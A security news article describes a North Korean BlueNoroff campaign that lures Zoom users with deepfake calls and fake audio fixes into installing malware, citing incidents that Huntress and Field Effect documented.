Security researchers are warning of a sharp uptick in social engineering attacks on Zoom users, traced back to BlueNoroff, a North Korean state-backed hacking group infamous for targeting financial institutions. The latest wave of attacks blends deepfake video calls, fake Zoom extensions, and terminal scripts, all designed to silently compromise victims’ systems and steal sensitive data.
In these attacks, victims are lured into Zoom meetings orchestrated by attackers, who then simulate technical issues—usually audio problems—to pressure targets into executing malicious scripts or downloading infected extensions. The result? Full remote access for the attackers and extensive data exfiltration.
From Deepfake Zoom Calls to Full-System Takeover
One of the most telling incidents involved Eugene Vyborov, founder and CEO of Ability AI. He was invited to what appeared to be a regular Zoom meeting. However, the call featured deepfakes of business associates, and when audio failed, he was directed to a phony Zoom support page urging him to run terminal commands. Sensing foul play, Vyborov cut off communication. The attackers, citing “company policy” when he suggested switching to Google Meet, promptly deleted their Telegram chat and disappeared.
Not all victims were so lucky. In late May, a Canadian online gambling employee fell victim to a similar scheme. According to Field Effect, the victim was tricked into running a script posed as a Zoom audio fix. Instead, it deployed infostealer malware and a loader that gave attackers long-term access to the system. Sensitive data—browser history, keychain credentials, and login details—was siphoned off almost immediately.
Then in June, Huntress documented another elaborate attack on a cryptocurrency foundation employee. The employee was invited to a Zoom call with deepfake versions of senior leadership. After microphone problems, they were told to download a fake Zoom extension sent via Telegram. The extension turned out to be AppleScript malware that installed multiple backdoors, keyloggers, and info stealers. Huntress identified eight separate malicious binaries, including CryptoBot, Root Troy V4, XScreen, and InjectWithDyld, designed to maintain stealthy persistence and extract valuable data.
A Clear BlueNoroff Signature, With Over 200 Malicious Domains in Play
Investigators from Huntress and Field Effect have attributed the attacks to BlueNoroff, a subgroup of North Korea’s notorious Lazarus Group. Also known by aliases such as Stardust Chollima and Sapphire Sleet, BlueNoroff is heavily involved in cryptocurrency theft operations and has long focused on infiltrating fintech, gambling, and blockchain platforms.
The tactics seen in these Zoom-related incidents—including the use of deepfake participants, fake support portals, and Telegram-delivered malware—align closely with BlueNoroff’s known playbook. Cyber threat firm Validin also uncovered over 200 domains linked to this ongoing campaign, suggesting that these attacks are part of a larger and well-coordinated operation targeting high-value individuals across multiple sectors.
The takeaway for businesses? Even familiar platforms like Zoom are now being weaponized by APTs (Advanced Persistent Threat groups). With social engineering becoming more advanced—and harder to detect—defenders need to remain vigilant, especially when video conferencing is involved.
